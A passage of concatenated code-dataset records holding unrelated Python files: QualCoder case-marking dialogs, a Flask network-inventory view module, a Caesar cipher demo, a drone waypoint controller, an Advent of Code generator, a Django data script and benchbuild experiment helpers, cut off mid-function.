')\n path = self.app.project_path + c['mediapath']\n url = QtCore.QUrl(path)\n\n def link_clicked(self, url):\n \"\"\" View image or audio/video media in dialog.\n For A/V, added try block in case VLC bindings do not work. \"\"\"\n\n x = -1\n for i in range(0, len(self.source)):\n if url.toString() == self.source[i]['mediapath']:\n x = i\n if x == -1:\n return\n ui = None\n try:\n if self.source[x]['mediapath'][:6] == \"/video\":\n ui = DialogViewAV(self.app, self.source[x])\n if self.source[x]['mediapath'][:6] == \"/audio\":\n ui = DialogViewAV(self.app, self.source[x])\n except Exception as e:\n logger.debug(str(e))\n print(e)\n QtWidgets.QMessageBox.warning(None, 'view av error', str(e), QtWidgets.QMessageBox.Ok)\n return\n if self.source[x]['mediapath'][:7] == \"/images\":\n ui = DialogViewImage(self.app, self.source[x])\n ui.exec_()\n memo = ui.ui.textEdit.toPlainText()\n if self.source[x]['memo'] != memo:\n self.source[x]['memo'] = memo\n cur = self.app.conn.cursor()\n cur.execute('update source set memo=? where id=?', (self.source[x]['memo'], self.source[x]['id']))\n self.app.conn.commit()\n\n def mark(self):\n \"\"\" Mark selected text in file with currently selected case. \"\"\"\n\n if self.selected_file is None:\n return\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n return\n #selectedText = self.textBrowser.textCursor().selectedText()\n pos0 = self.ui.textBrowser.textCursor().selectionStart()\n pos1 = self.ui.textBrowser.textCursor().selectionEnd()\n # add new item to case_text list and database and update GUI\n item = {'caseid': int(self.cases[row]['caseid']), 'fid': int(self.selected_file['id']),\n 'pos0': pos0, 'pos1': pos1, 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n self.case_text.append(item)\n self.highlight()\n\n cur = self.app.conn.cursor()\n # check for an existing duplicated linkage first\n cur.execute(\"select * from case_text where caseid = ? and fid=? and pos0=? and pos1=?\",\n (item['caseid'], item['fid'], item['pos0'], item['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n QtWidgets.QMessageBox.warning(None, _(\"Already Linked\"),\n _(\"This segment has already been linked to this case\"))\n return\n cur.execute(\"insert into case_text (caseid,fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\"\n ,(item['caseid'],item['fid'],item['pos0'],item['pos1'],item['owner'],item['date'],item['memo']))\n self.app.conn.commit()\n\n def unmark(self):\n \"\"\" Remove case marking from selected text in selected file. \"\"\"\n\n if self.selected_file is None:\n return\n if len(self.case_text) == 0:\n return\n location = self.ui.textBrowser.textCursor().selectionStart()\n unmarked = None\n for item in self.case_text:\n if location >= item['pos0'] and location <= item['pos1']:\n unmarked = item\n if unmarked is None:\n return\n\n # delete from database, remove from case_text and update gui\n cur = self.app.conn.cursor()\n cur.execute(\"delete from case_text where fid=? and caseid=? and pos0=? and pos1=?\",\n (unmarked['fid'], unmarked['caseid'], unmarked['pos0'], unmarked['pos1']))\n self.app.conn.commit()\n if unmarked in self.case_text:\n self.case_text.remove(unmarked)\n self.unlight()\n self.highlight()\n\n def automark(self):\n \"\"\" Automark text in one or more files with selected case. 
\"\"\"\n\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No case was selected\"))\n return\n ui = DialogSelectFile(self.source, _(\"Select files to assign case\"), \"many\")\n ok = ui.exec_()\n if not ok:\n return\n files = ui.get_selected()\n if len(files) == 0:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No file was selected\"))\n return\n #logger.debug(str(files))\n #logger.debug(str(type(files)))\n filenames = \"\"\n for f in files:\n filenames += f['name'] + \" \"\n ui = DialogGetStartAndEndMarks(self.cases[row]['name'], filenames)\n ok = ui.exec_()\n if not ok:\n return\n start_mark = ui.get_start_mark()\n end_mark = ui.get_end_mark()\n if start_mark == \"\" or end_mark == \"\":\n QtWidgets.QMessageBox.warning(None, _('Warning'), _('Cannot have blank text marks'))\n return\n warnings = 0\n for f in files:\n cur = self.app.conn.cursor()\n cur.execute(\"select name, id, fulltext, memo, owner, date from source where id=?\",\n [f['id']])\n currentfile = cur.fetchone()\n text = currentfile[2]\n text_starts = [match.start() for match in re.finditer(re.escape(start_mark), text)]\n text_ends = [match.start() for match in re.finditer(re.escape(end_mark), text)]\n #logger.debug(textStarts, textEnds)\n #add new code linkage items to database\n for startPos in text_starts:\n pos1 = -1 # default if not found\n textEndIterator = 0\n try:\n while startPos >= text_ends[textEndIterator]:\n textEndIterator += 1\n except IndexError:\n textEndIterator = -1\n warnings += 1\n logger.warning(\"Could not find end mark: \" + f['name'] + \" \" + end_mark)\n\n if textEndIterator >= 0:\n pos1 = text_ends[textEndIterator]\n item = {'caseid': int(self.cases[row]['caseid']), 'fid': int(f['id']),\n 'pos0': startPos, 'pos1': pos1,\n 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n\n cur = self.app.conn.cursor()\n cur.execute(\"insert into case_text (caseid,fid,pos0,pos1,owner,date,memo) values(?,?,?,?,?,?,?)\"\n ,(item['caseid'], item['fid'], item['pos0'], item['pos1'],\n item['owner'], item['date'], item['memo']))\n self.app.conn.commit()\n if warnings > 0:\n QtWidgets.QMessageBox.warning(None, _('Warning'),\n _(\"End mark did not match up: \") + str(warnings))\n self.ui.tableWidget.clearSelection()\n\n\nclass DialogGetStartAndEndMarks(QtWidgets.QDialog):\n ''' This dialog gets the start and end mark text to allow file text to be\n automatically assigned to the currently selected case.\n It requires the name of the selected case and the filenames - for display purposes only.\n Methods return the user's choices for the startmark text and the endmark text.\n '''\n\n caseName = \"\"\n\n def __init__(self, case_name, filenames):\n\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_Dialog_StartAndEndMarks()\n self.ui.setupUi(self)\n self.ui.label_case.setText(case_name)\n self.ui.label_files.setText(\"Files: \" + str(filenames))\n\n def get_start_mark(self):\n return str(self.ui.lineEdit_startmark.text())\n\n def get_end_mark(self):\n return str(self.ui.lineEdit_endmark.text())\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ui = DialogGetStartAndEndMarks(\"case one\", [\"file 1\",\"file 2\"])\n ui.show()\n sys.exit(app.exec_())\n\n","sub_path":"qualcoder/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":37555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"326193188","text":"from flask import render_template, jsonify, send_file, request\nfrom www import infoset\nfrom os import listdir, walk, path, makedirs, remove\nfrom infoset.utils.rrd.rrd_xlate import RrdXlate\nimport yaml\n\n\n@infoset.route('/')\ndef index():\n hosts = getHosts()\n return render_template('index.html',\n hosts=hosts)\n \n@infoset.route('/search')\ndef search():\n return render_template('search.html', results=[])\n\n\n@infoset.route('/search/<query>')\ndef searchq(query):\n info = getInfo() #This is a list of dictionaries\n hosts = getHosts()\n results = [] #results of search query\n\n #if query is a mac address since ips normally start with one\n if query[0] != '1':\n query = query.replace('.',\"\")\n query = query.replace(':',\"\")\n query = query.replace('-',\"\")\n\n for data in info:\n for ip, mac in data.items():\n if ip == query:\n #print(\"%s | %s | %s\" %(data['host'],ip,mac))\n results.append((\"Host: %s | IP Address: %s | MAC Address: %s\"\n +\" | DNS: | Port Label: \")\n %(data['host'],ip,mac))\n elif mac == query:\n #print(\"%s | %s | %s\" %(data['host'],ip,mac))\n results.append((\"Host: %s | IP Address: %s | MAC Address: %s\"\n +\" | DNS: | Port Label: \")\n %(data['host'],ip,mac))\n\n if results == []:\n results.append(\"No Results Found\")\n\n return render_template('search.html', results=results)\n\n\n@infoset.route('/hosts')\ndef hosts():\n hosts = getHosts()\n return jsonify(hosts)\n\n\n@infoset.route('/hosts/<host>')\ndef host(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n return jsonify(yaml_dump)\n\n\n@infoset.route('/hosts/<host>/layer1')\ndef layerOne(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer1 = yaml_dump['layer1']\n return jsonify(layer1)\n\n\n@infoset.route('/hosts/<host>/layer2')\ndef layerTwo(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer2 = yaml_dump['layer2']\n return jsonify(layer2)\n\n\n@infoset.route('/devices')\ndef devices():\n hosts = getHosts()\n devices = getDevices()\n return render_template('devices.html',\n hosts=hosts,\n devices=devices)\n\n@infoset.route('/devices/<uid>')\ndef device_details(uid):\n devices = getDevices()\n device_details = getDeviceDetails(uid)\n device_path = \"./www/static/devices/linux/\" + str(uid)\n rrd_root = RrdXlate(device_path)\n rrd_root.rrd_graph()\n return render_template('device.html',\n uid=uid,\n devices=devices,\n details=device_details)\n\n@infoset.route('/receive/<uid>', methods=[\"POST\"])\ndef receive(uid):\n device_path = \"./www/static/devices/linux/\" + str(uid)\n content = request.json\n if not path.exists(device_path):\n makedirs(device_path)\n\n active_yaml_path = device_path + \"/active.yaml\"\n # Out with the old\n remove(active_yaml_path)\n # In with the new\n with open(active_yaml_path, \"w+\") as active_file:\n active_file.write(yaml.dump(content, default_flow_style=False))\n active_file.close()\n\n rrd_root = RrdXlate(\"./www/static/devices/linux/\")\n\n rrd_root.rrd_update()\n return \"Received\"\n\n\ndef getHosts():\n hosts = {}\n for root, directories, files 
in walk('./www/static/yaml'):\n for filename in files:\n filepath = path.join(root, filename)\n hosts[filename[:-5]] = filepath # Add it to the list.\n return hosts\n\ndef getDeviceDetails(uid):\n active_yaml = {}\n filepath=\"./www/static/devices/linux/\" + str(uid) + \"/active.yaml\"\n with open(filepath, 'r') as stream:\n try:\n active_yaml = yaml.load(stream)\n except Exception as e:\n raise e\n return active_yaml\n\ndef getDevices():\n active_yamls = {}\n devices = []\n root=\"./www/static/devices/linux/\"\n directories = [d for d in listdir(root) if path.isdir(path.join(root, d))]\n\n for directory in directories:\n filepath = \"./www/static/devices/linux/\" + directory + \"/active.yaml\"\n active_yamls[directory] = filepath\n\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n devices.append(yaml_dump)\n return devices\n \ndef getLayer(host, layer):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer = yaml_dump['layer'+str(layer)]\n return layer\n\ndef getInfo():\n hosts = getHosts()\n info = []\n for host in hosts.keys():\n for val in getLayer(host, 3).values():\n val['host'] = host\n info.append(val)\n return info\n","sub_path":"www/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82495817","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/MessageBus.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"Message Bus for Sutekh\"\"\"\nCONFIG_MSG, CARD_TEXT_MSG, DATABASE_MSG = range(3)\n\nclass MessageBus(object):\n \"\"\"The actual message bus\"\"\"\n _dSubscriptions = {}\n\n @classmethod\n def subscribe(cls, oObject, sSignalName, fCallback):\n \"\"\"Subscribe to a given signal on an object\"\"\"\n if oObject not in cls._dSubscriptions:\n cls._dSubscriptions[oObject] = {}\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n dCallbacks[sSignalName] = []\n dCallbacks[sSignalName].append(fCallback)\n\n @classmethod\n def publish(cls, oObject, sSignalName, *args, **kwargs):\n \"\"\"Publish the signal to any subscribers\"\"\"\n if oObject not in cls._dSubscriptions:\n return\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n return\n for fCallback in dCallbacks[sSignalName]:\n fCallback(*args, **kwargs)\n\n @classmethod\n def unsubscribe(cls, oObject, sSignalName, fCallback):\n \"\"\"Remove a callback from the list\"\"\"\n if oObject not in cls._dSubscriptions:\n return\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n return\n if fCallback not in dCallbacks[sSignalName]:\n return\n dCallbacks[sSignalName].remove(fCallback)\n\n @classmethod\n def clear(cls, oObject):\n \"\"\"Clear all callbacks associated with the given object\"\"\"\n if oObject in cls._dSubscriptions:\n del cls._dSubscriptions[oObject]","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/MessageBus.py","file_name":"MessageBus.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185773581","text":"#!/usr/bin/env python\n# coding: 
utf-8\n\n# In[87]:\n\n\ndef encrypt(k, m):\n lst = [chr((ord(i)+k)%65536) for i in m]\n return ''.join(lst)\n\n\ndef decrypt(k, c):\n lst = [chr((ord(i)-k)%65536) for i in c]\n return ''.join(lst)\n\ncode = encrypt(3, 'abcdefgh12345')\nprint(\"Encrypted message: \" + code)\n\nmessage = decrypt(3, code)\nprint(\"Decrypted message: \" + message)\n\n","sub_path":"сaesar_cipher.py","file_name":"сaesar_cipher.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198719202","text":"from collections import OrderedDict\nfrom six import iteritems\n\n\nclass Scope:\n def __init__(self, *parents):\n self.parents = list(parents)\n self.symbols = OrderedDict()\n self.attrs = set()\n self.owner = None\n\n def add_symbol(self, name, symbol):\n self.symbols[name] = symbol\n\n def find_symbol(self, name, strict=False):\n symbol = self.symbols.get(name)\n if symbol is None:\n for parent in self.parents:\n if parent is None:\n continue\n symbol = parent.find_symbol(name, strict)\n if symbol is not None:\n break\n if strict:\n break\n return symbol\n\n def __str__(self):\n s = ', '.join(['%s -> %s' % (name, value) for name, value in iteritems(self.symbols)])\n if len(self.parents) == 0:\n return s\n if self.parents[0] is None:\n return s\n ps = str(self.parents[0])\n if len(ps) == 0:\n return s\n return '%s, %s' % (s, ps)\n","sub_path":"c_ext/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161649214","text":"#!/usr/bin/env python\n\n\"\"\"\nShow all tools in bin directory.\n\nUsage:\n show_bin -h | --help\n show_bin [-v | --verbose]\n\nOptions:\n -h, --help Show this help message and exit.\n -v, --verbose Show detailed help of bin tools.\n\"\"\"\n\nimport os\nimport sys\nfrom docopt import docopt\n\n\ndef main(args):\n \"\"\"Show all tools in bin directory.\"\"\"\n USER = os.path.expanduser('~')\n BIN = os.path.join(USER, 'bin')\n files = [fname for fname in os.listdir(BIN)\n if os.path.isfile(os.path.join(BIN, fname))]\n if \"connect\" in files:\n files.remove('connect')\n print(\"# Tools located in bin directory\")\n for filename in sorted(files):\n filename_no_ext = str(filename).split(\".\")[0]\n if args['--verbose']:\n doc_string = __import__(filename_no_ext).__doc__.splitlines()\n if len(doc_string) == 1:\n print(\"{0:15}: {1}\".format(filename_no_ext, doc_string[0]))\n else:\n print(\"{0:15}: {1}\".format(filename_no_ext, doc_string[1]))\n else:\n print(filename)\n\n\nif __name__ == '__main__':\n args = (docopt(__doc__, version='show_bin 0.1'))\n sys.exit(main(args))\n","sub_path":"bin/show_bin.py","file_name":"show_bin.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88707591","text":"import argparse\nimport time\nfrom enum import Enum\n\nimport numpy as np\n\nfrom udacidrone import Drone\nfrom udacidrone.connection import MavlinkConnection, WebSocketConnection # noqa: F401\nfrom udacidrone.messaging import MsgID\n\n\nclass States(Enum):\n MANUAL = 0\n ARMING = 1\n TAKEOFF = 2\n WAYPOINT = 3\n LANDING = 4\n DISARMING = 5\n\n\nclass BackyardFlyer(Drone):\n\n def __init__(self, connection):\n super().__init__(connection)\n self.target_position = np.array([0.0, 0.0, 0.0])\n self.all_waypoints = []\n self.in_mission = True\n self.check_state = {}\n self.target_altitude = 3.0\n 
self.box_size = 10.0 # length in meters of each side of box to navigate\n\n # initial state\n self.flight_state = States.MANUAL\n\n # Register all your callbacks here\n self.register_callback(MsgID.LOCAL_POSITION, self.local_position_callback)\n self.register_callback(MsgID.STATE, self.state_callback)\n\n def local_position_callback(self):\n \"\"\"\n This triggers when `MsgID.LOCAL_POSITION` is received and\n self.local_position contains new data\n \"\"\"\n if self.flight_state == States.TAKEOFF:\n # on takeoff, check when altitude is 95% of target before box nav start\n if -self.local_position[2] > 0.95 * self.target_position[2]:\n self.all_waypoints = self.calculate_box()\n self.waypoint_transition()\n elif self.flight_state == States.WAYPOINT:\n # if drone within 1 meter of target location (excluding heading, altitude positions), transition state\n if np.linalg.norm(self.target_position[0:2] - self.local_position[0:2]) < 1.0:\n # move to next waypoint if nav not finished, else land\n if self.all_waypoints:\n self.waypoint_transition()\n else:\n if np.linalg.norm(self.local_velocity[0:2]) < 1.0:\n self.landing_transition()\n elif self.flight_state == States.LANDING:\n # when landing and drone at start altitude + altitude < 0.1m, disarm\n if self.global_position[2] - self.global_home[2] < 0.1:\n if abs(self.local_position[2]) < 0.1:\n self.disarming_transition()\n\n def state_callback(self):\n \"\"\"\n This triggers when `MsgID.STATE` is received and self.armed and self.guided contain new data\n \"\"\"\n if self.in_mission:\n if self.flight_state == States.MANUAL:\n self.arming_transition()\n elif self.flight_state == States.ARMING:\n if self.armed:\n self.takeoff_transition()\n elif self.flight_state == States.DISARMING:\n if ~self.armed & ~self.guided:\n self.manual_transition()\n\n def calculate_box(self):\n \"\"\"\n Returns waypoints to fly a box clockwise\n \"\"\"\n # Waypoints in form (N, E, altitude, radians)\n box_coordinates = [ [self.box_size, 0.0, self.target_altitude, 0.0],\n [self.box_size, self.box_size, self.target_altitude, 0.0],\n [0.0, self.box_size, self.target_altitude, 0.0],\n [0.0, 0.0, self.target_altitude, 0.0] ]\n return box_coordinates\n\n def arming_transition(self):\n \"\"\"\n Take control of drone, arm, set home location, transition states\n \"\"\"\n self.take_control() # Take control of the drone\n self.arm() # Pass an arming command\n self.set_home_position(*self.global_position[0:3]) # Set the home location to current position\n self.flight_state = States.ARMING # Transition to the ARMING state\n\n def takeoff_transition(self):\n \"\"\"\n Set target altitude, takeoff, transition states\n \"\"\"\n print(\"takeoff transition\")\n self.target_position[2] = self.target_altitude # Set target_position altitude\n self.takeoff(self.target_altitude) # Command a takeoff\n self.flight_state = States.TAKEOFF # Transition to the TAKEOFF state\n\n def waypoint_transition(self):\n \"\"\"\n Command the next waypoint position and transition states\n \"\"\"\n print(\"waypoint transition\")\n self.target_position = self.all_waypoints.pop(0) # next position\n # set nav needed to reach next location - N, E, altitude, heading (radians)\n self.cmd_position(*self.target_position)\n self.flight_state = States.WAYPOINT # Transition to WAYPOINT state\n\n def landing_transition(self):\n \"\"\"\n Land drone and transition states\n \"\"\"\n print(\"landing transition\")\n self.land() # land drone\n self.flight_state = States.LANDING # transition states to LANDING state\n\n def 
disarming_transition(self):\n \"\"\"\n Disarm drone and transition states\n \"\"\"\n print(\"disarm transition\")\n self.disarm() # disarm drone\n self.flight_state = States.DISARMING # Transition to DISARMING state\n\n def manual_transition(self):\n \"\"\"\n 1. Release control of the drone\n 2. Stop the connection (and telemetry log)\n 3. End the mission\n 4. Transition to the MANUAL state\n \"\"\"\n print(\"manual transition\")\n self.release_control()\n self.stop()\n self.in_mission = False\n self.flight_state = States.MANUAL\n\n def start(self):\n \"\"\"\n 1. Open a log file\n 2. Start the drone connection\n 3. Close the log file\n \"\"\"\n print(\"Creating log file\")\n self.start_log(\"Logs\", \"NavLog.txt\")\n print(\"starting connection\")\n self.connection.start()\n print(\"Closing log file\")\n self.stop_log()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', type=int, default=5760, help='Port number')\n parser.add_argument('--host', type=str, default='127.0.0.1', help=\"host address, i.e. '127.0.0.1'\")\n args = parser.parse_args()\n\n conn = MavlinkConnection('tcp:{0}:{1}'.format(args.host, args.port), threaded=False, PX4=False)\n #conn = WebSocketConnection('ws://{0}:{1}'.format(args.host, args.port))\n drone = BackyardFlyer(conn)\n time.sleep(2)\n drone.start()\n","sub_path":"backyard_flyer.py","file_name":"backyard_flyer.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447420185","text":"#!/usr/bin/env python3.6\nimport argparse\n\ndef generator(start, factor, filter_val):\n value = start\n\n while True:\n value = (value * factor) % 2147483647\n if value % filter_val == 0:\n yield value\n\nparser = argparse.ArgumentParser(\n description='Solution for part 2 of day 15')\nparser.add_argument('start_a', metavar='start_a', type=int)\nparser.add_argument('factor_a', metavar='factor_a', type=int)\nparser.add_argument('filter_a', metavar='filter_a', type=int)\nparser.add_argument('start_b', metavar='start_b', type=int)\nparser.add_argument('factor_b', metavar='factor_b', type=int)\nparser.add_argument('filter_b', metavar='filter_b', type=int)\n\nargs = parser.parse_args()\n\ngen_a = generator(args.start_a, args.factor_a, args.filter_a)\ngen_b = generator(args.start_b, args.factor_b, args.filter_b)\n\nmatches = 0\nfor i in range(5000000):\n val_a = next(gen_a)\n val_b = next(gen_b)\n\n if (val_a & 0xFFFF) == (val_b & 0xFFFF):\n matches += 1\n\nprint(matches)\n","sub_path":"day15/generator_filter/generator_filter.py","file_name":"generator_filter.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"74222788","text":"from django.db import transaction\n\nfrom api.management.data_script import OperationalDataScript\nfrom api.models.ProvisionOfTheAct import ProvisionOfTheAct\n\n\nclass UpdateProvisionsOfTheAct(OperationalDataScript):\n \"\"\"\n Updates the effective dates for the provisions of the act,\n so it follows our pattern with the other credit calculation\n tables\n \"\"\"\n is_revertable = False\n comment = 'Updates the Provisions of the Act effective dates and order'\n\n def check_run_preconditions(self):\n return True\n\n @transaction.atomic\n def run(self):\n provisions = ProvisionOfTheAct.objects.order_by('description')\n display_order = 1\n\n for provision in provisions:\n provision.display_order = display_order\n 
provision.effective_date = \"2017-01-01\"\n provision.expiration_date = None\n provision.save()\n\n display_order += 1\n\nscript_class = UpdateProvisionsOfTheAct\n","sub_path":"backend/api/fixtures/operational/0015_update_provisions_of_the_act.py","file_name":"0015_update_provisions_of_the_act.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385917402","text":"\"\"\"Experiment helpers.\"\"\"\nimport enum\nimport logging\nimport os\nimport subprocess\nimport sys\nimport typing as t\nfrom contextlib import contextmanager\n\nfrom plumbum import TEE, local\nfrom plumbum.commands import ProcessExecutionError\n\nimport attr\nimport benchbuild.signals as signals\nfrom benchbuild import settings\nfrom benchbuild.settings import CFG\nfrom benchbuild.utils.cmd import mkdir\nfrom benchbuild.utils.path import list_to_path\n\nLOG = logging.getLogger(__name__)\n\n\ndef fetch_time_output(marker, format_s, ins):\n \"\"\"\n Fetch the output /usr/bin/time from a.\n\n Args:\n marker: The marker that limits the time output\n format_s: The format string used to parse the timings\n ins: A list of lines we look for the output.\n\n Returns:\n A list of timing tuples\n \"\"\"\n from parse import parse\n\n timings = [x for x in ins if marker in x]\n res = [parse(format_s, t) for t in timings]\n return [_f for _f in res if _f]\n\n\ndef begin_run_group(project):\n \"\"\"\n Begin a run_group in the database.\n\n A run_group groups a set of runs for a given project. This models a series\n of runs that form a complete binary runtime test.\n\n Args:\n project: The project we begin a new run_group for.\n\n Returns:\n ``(group, session)`` where group is the created group in the\n database and session is the database session this group lives in.\n \"\"\"\n from benchbuild.utils.db import create_run_group\n from datetime import datetime\n\n group, session = create_run_group(project)\n group.begin = datetime.now()\n group.status = 'running'\n\n session.commit()\n return group, session\n\n\ndef end_run_group(group, session):\n \"\"\"\n End the run_group successfully.\n\n Args:\n group: The run_group we want to complete.\n session: The database transaction we will finish.\n \"\"\"\n from datetime import datetime\n\n group.end = datetime.now()\n group.status = 'completed'\n session.commit()\n\n\ndef fail_run_group(group, session):\n \"\"\"\n End the run_group unsuccessfully.\n\n Args:\n group: The run_group we want to complete.\n session: The database transaction we will finish.\n \"\"\"\n from datetime import datetime\n\n group.end = datetime.now()\n group.status = 'failed'\n session.commit()\n\n\n@attr.s(cmp=False)\nclass RunInfo(object):\n \"\"\"\n Execution context of wrapped binaries.\n\n Execution of tracked binaries is guarded with this context\n object. 
In here we store everything about a single binary\n execution for consumption of an experiment.\n\n Attributes:\n cmd ():\n failed ():\n project ():\n experiment ():\n retcode ():\n stdout ():\n stderr ():\n db_run ():\n session ():\n \"\"\"\n\n def __begin(self, command, project, ename, group):\n \"\"\"\n Begin a run in the database log.\n\n Args:\n command: The command that will be executed.\n pname: The project name we belong to.\n ename: The experiment name we belong to.\n group: The run group we belong to.\n\n Returns:\n (run, session), where run is the generated run instance and\n session the associated transaction for later use.\n \"\"\"\n from benchbuild.utils.db import create_run\n from benchbuild.utils import schema as s\n from datetime import datetime\n\n db_run, session = create_run(command, project, ename, group)\n db_run.begin = datetime.now()\n db_run.status = 'running'\n log = s.RunLog()\n log.run_id = db_run.id\n log.begin = datetime.now()\n log.config = repr(CFG)\n session.add(log)\n session.add(db_run)\n\n self.db_run = db_run\n self.session = session\n\n def __end(self, stdout, stderr):\n \"\"\"\n End a run in the database log (Successfully).\n\n This will persist the log information in the database and commit the\n transaction.\n\n Args:\n db_run: The ``run`` schema object we belong to\n session: The db transaction we belong to.\n stdout: The stdout we captured of the run.\n stderr: The stderr we capture of the run.\n \"\"\"\n from benchbuild.utils.schema import RunLog\n from datetime import datetime\n\n run_id = self.db_run.id\n\n log = self.session.query(RunLog).filter(RunLog.run_id == run_id).one()\n log.stderr = stderr\n log.stdout = stdout\n log.status = 0\n log.end = datetime.now()\n\n self.db_run.end = datetime.now()\n self.db_run.status = 'completed'\n self.session.add(log)\n self.session.add(self.db_run)\n\n def __fail(self, retcode, stdout, stderr):\n \"\"\"\n End a run in the database log (Unsuccessfully).\n\n This will persist the log information in the database and commit the\n transaction.\n\n Args:\n db_run: The ``run`` schema object we belong to\n session: The db transaction we belong to.\n retcode: The return code we captured of the run.\n stdout: The stdout we captured of the run.\n stderr: The stderr we capture of the run.\n \"\"\"\n from benchbuild.utils.schema import RunLog\n from datetime import datetime\n run_id = self.db_run.id\n\n log = self.session.query(RunLog).filter(RunLog.run_id == run_id).one()\n log.stderr = stderr\n log.stdout = stdout\n log.status = retcode\n log.end = datetime.now()\n\n self.db_run.end = datetime.now()\n self.db_run.status = 'failed'\n self.failed = True\n self.session.add(log)\n self.session.add(self.db_run)\n\n cmd = attr.ib(default=None, repr=False)\n failed = attr.ib(default=False)\n project = attr.ib(default=None, repr=False)\n experiment = attr.ib(default=None, repr=False)\n retcode = attr.ib(default=0)\n stdout = attr.ib(default=attr.Factory(list), repr=False)\n stderr = attr.ib(default=attr.Factory(list), repr=False)\n\n db_run = attr.ib(init=False, default=None)\n session = attr.ib(init=False, default=None, repr=False)\n\n def __attrs_post_init__(self):\n self.__begin(self.cmd, self.project, self.experiment.name,\n self.project.run_uuid)\n signals.handlers.register(self.__fail, 15, \"SIGTERM\", \"SIGTERM\")\n\n run_id = self.db_run.id\n settings.CFG[\"db\"][\"run_id\"] = run_id\n\n def __add__(self, rhs):\n if rhs is None:\n return self\n\n new_run_info = RunInfo(\n retcode=self.retcode + rhs.retcode,\n 
stdout=self.stdout + rhs.stdout,\n stderr=self.stderr + rhs.stderr,\n db_run=[self.db_run, rhs.db_run],\n session=self.session)\n return new_run_info\n\n @property\n def has_failed(self):\n \"\"\"Check, whether this run failed.\"\"\"\n return self.failed\n\n def __call__(self, *args, expected_retcode=0, ri=None, **kwargs):\n cmd_env = settings.CFG.to_env_dict()\n\n with local.env(**cmd_env):\n try:\n bin_name = sys.argv[0]\n retcode, stdout, stderr = \\\n self.cmd & TEE(retcode=expected_retcode)\n f_stdout = bin_name + \".stdout\"\n f_stderr = bin_name + \".stderr\"\n with open(f_stdout, 'w') as fd_stdout:\n fd_stdout.write(stdout)\n\n with open(f_stderr, 'w') as fd_stderr:\n fd_stderr.write(stderr)\n\n self.retcode = retcode\n self.stdout = stdout\n self.stderr = stderr\n self.__end(str(stdout), str(stderr))\n except ProcessExecutionError as ex:\n self.__fail(ex.retcode, ex.stderr, ex.stdout)\n self.retcode = ex.retcode\n self.stdout = ex.stdout\n self.stderr = ex.stderr\n\n LOG.debug(\"Tracked process failed\")\n LOG.error(str(ex))\n except KeyboardInterrupt:\n # retcode/stdout/stderr may be unbound if the interrupt\n # landed while the command was still running\n self.retcode = -1\n self.stdout = \"\"\n self.stderr = \"\"\n self.__fail(-1, \"\", \"KeyboardInterrupt\")\n LOG.warning(\"Interrupted by user input\")\n raise\n finally:\n signals.handlers.deregister(self.__fail)\n\n return self\n\n def commit(self):\n self.session.commit()\n\n\ndef exit_code_from_run_infos(run_infos: t.List[RunInfo]) -> int:\n 